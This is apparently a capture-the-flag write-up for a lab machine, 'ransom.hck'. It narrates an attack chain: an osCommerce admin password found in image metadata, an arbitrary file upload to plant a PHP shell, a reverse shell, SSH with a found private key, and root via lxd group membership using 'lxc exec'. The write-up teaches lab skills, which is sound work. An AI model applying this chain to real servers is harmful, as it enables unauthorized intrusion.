Summary

As always I started with nmap port scan and nmap said there were some ports open along with the http and ssh. After some enumeration we found a way to exploit http service and gained user access to the machine. After the LinEnum.sh script I saw our user access could be misconfigured. I’ve seen similar question before so I thought I could capture the flag. Then I did some google search found a writeup about it, I did privilege escalation with that writeup and captured the flag.

Starting with nmap scan

It had some ports open, when I saw the http port open in CTFs I visit them with my browser. The website directed me to another address called ransom.hck. My browser couldn’t find the server address due to there was no domain such ransom.hck in domain name servers. Therefore, I add this domain to my computer’s hosts file manually.

brazil-hosts-file

Browsing the pages/directories

When I followed the redirection with my browser it redirected me to ransom.hck/oscommerce address. We looked for vulnerabilities for osCommerce on the internet then we saw it had couple of vulnerabilities some of them were authanticated some of them were not. We tried to exploit osCommerce script without any user credentials but we failed.

After some time I wanted to look source code of root directory of the ransom.hck(I don’t know why haven’t tried it before) to check if we missed something. Yes, we totally missed something. When I did curl -vvv http://ransom.hck I saw something strange, a strange filename commented out of the html source code.

The file was named ransom.jpg, we instantly found that file on the website.

brazil-ransom-jpg
(The ransom.jpg file)

After that we discovered a string from ransom.jpg’s meta-data.

brazil-ransom-jpg-meta-data

Continuing with osCommerce Arbitrary File Upload

The string was 12aN5oM. We tried connecting to machine via SSH by using this string for many combinations but again we failed that. After a while we discovered that string was the admin password of osCommerce script.

brazil-oscommerce-admin-panel

After that we went back to osCommerce exploits, I tried a upload vulnerability from exploit-db.com[1] and it worked. I did successfully upload a php shell[2].

brazil-uploading-php-shell

brazil-php-shell

After I uploaded the php shell I wanted a reverse shell[3] to my computer. This was an unnecessary step for this question.

Enumerating files to gain SSH access

We enumerated the machine and my team said “there is an interesting file” which was called .up

brazil-rsa-private-key

We tried to connect to the machine via SSH by using this RSA private key(We found the username earlier from /etc/passwd)

I usually run LinEnum.sh[4] script when I had SSH connection, it’s one of my favourite scripts. After it has finished showed me the result. Script said “We’re a member of the (lxd) group - could possibly misuse these rights!”.

brazil-linenum.sh

Privilege escalation with LXD/LXC

I’ve done something like this before but that was a Docker container related question and I thought I could done this question as well.

After some research on google I found a writeup about a Hack The Box machine[5].

brazil-lxd-lxc-privesc-reference

I uploaded my linux container to the machine then I did something similar to that writeup, you may want to read it for this step.

Then with the following magical command I gained root privilege:

lxc exec mycontainer /bin/sh

After the privesc work it was easy to capture the flag. brazil-flag

Reference:

  1. 1: osCommerce 2.3.4.1 Arbitrary File Upload from exploit-db 

  2. 2: PHP Shell from flozz github 

  3. 3: Reverse Shell Cheatseet from pentestmonkey 

  4. 4: LinEnum.sh from rebootuser github 

  5. 5: Privilege Escalation via LXD/LXC https://dominicbreuker.com/post/htb_calamity/